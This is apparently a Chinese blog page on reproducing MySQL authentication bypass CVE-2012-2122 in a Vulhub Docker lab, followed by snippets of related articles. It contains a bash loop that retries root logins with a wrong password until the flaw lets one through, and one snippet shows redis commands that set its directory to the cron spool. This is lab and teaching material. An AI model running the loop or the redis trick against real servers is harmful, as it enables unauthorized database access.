msyql CVE-2012-2122漏洞复现

最新推荐文章于 2025-06-05 19:54:29 发布
原创 最新推荐文章于 2025-06-05 19:54:29 发布 · 589 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文档详细介绍了如何复现MySQL的CVE-2012-2122漏洞。首先,通过Vulhub搭建了MySQL 5.5.23的漏洞环境,启动后服务监听3306端口,使用默认密码123456可以登录。然后,在不知晓正确密码的情况下,通过特定的bash命令,尝试一定次数后可以无密码成功登录数据库。文章还提供了相关的POC代码供参考。

搭建

进入vulhub对应mysql漏洞环境,执行如下命令即可

docker-compose up -d

在这里插入图片描述
如上则启动成功
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。

漏洞复现

在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

最低0.47元/天 解锁文章
CVE-2012-2122)Mysql身份认证漏洞
weixin_45253622的博客
05-27 6506
目录 漏洞描述 影响版本 漏洞复现 使用MSF进行检测: 使用Linux执行命令进行爆破复现: ​使用python脚本进行复现漏洞修复 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1...
Mysql CVE-2012-2122(vulhub)漏洞复现
MDSEC的博客
08-23 514
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
【Mysql身份认证漏洞复现(CVE-2012-2122)】
qq_61947585的博客
07-06 442
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
mysql身份认证绕过漏洞复现CVE-2012-2122
weixin_53730939的博客
03-12 1847
mysql身份认证绕过漏洞复现CVE-2012-2122
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2907
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
服务攻防-数据库-cve复现(Mysql cve-2012-2122、redis未授权访问漏洞、CouchDB垂直越权漏洞CVE-2017-12635)、Couchdb 任意命令执行漏洞(CVE-
m0_74402888的博客
07-20 1380
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务。config set dir /var/spool/cron/ //或者 /var/spool/cron/crontabs。
Mysql 身份认证绕过 CVE-2012-2122 漏洞复现
Senimo
05-03 872
CVE-2012-2122 Mysql 身份认证绕过漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 二、漏洞影响 All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5
Mysql 身份认证绕过漏洞CVE-2012-2122复现
weixin_57379923的博客
08-09 1154
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
MySQL身份认证漏洞(CVE-2012-2122漏洞复现
weixin_48739941的博客
04-11 3061
(1)漏洞原理 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。 (2)修复 ①对数据库进行升级打补丁。 ②在防火墙上关闭MySQL端口。 (3)cd vulhub/mysql/CVE-2012-2122 切换目录。 (4)vim docker-compose.yml 修改端口映射。 (5)dock
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4981
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
CVE-2012-2122: MySQL身份认证漏洞
Yatere的天平秤
06-11 1988
http://seclists.org/oss-sec/2012/q2/493 我今天早上打开电脑,在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞,几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c),在知道用户名的情况下(如
MySQL身份认证绕过漏洞CVE-2012-2122
qq115399231的博客
07-16 3641
漏洞介绍 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1:256。 受影响版...
Mysql 身份认证绕过漏洞CVE-2012-2122
m0_63521991的博客
10-19 1683
CVE-2012-2122 是 MySQL 数据库中的一个身份认证绕过漏洞,也被称为 "MySQL Authentication Bypass" 漏洞。该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,使得攻击者可以绕过身份认证并以未经授权的方式访问数据库。
Mysql 身份认证绕过漏洞 CVE-2012-2122
m0_73135216的博客
06-05 599
CVE-2012-2122 是一个影响 MySQL 和 MariaDB 的身份验证漏洞,存在于特定版本中任务一 介绍 CVE-2012-2122
Vulhub之mysql CVE-2012-2122
xueyuel的博客
11-10 1078
vulhub的mysql身份验证绕过漏洞
Mysql 身份认证绕过(CVE-2012-2122
bqnagus
10-02 1022
Mysql 身份认证绕过(CVE-2012-2122复现
cve-2012-2122漏洞原理
最新发布
06-18
CVE-2012-2122 是一个存在于 MySQL 和 MariaDB 中的身份认证绕过漏洞。该漏洞利用了 `memcmp` 函数在特定编译环境下的行为差异,使得攻击者可以通过构造恶意数据包绕过身份验证[^3]。 #### 漏洞原理 MySQL 的身份...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值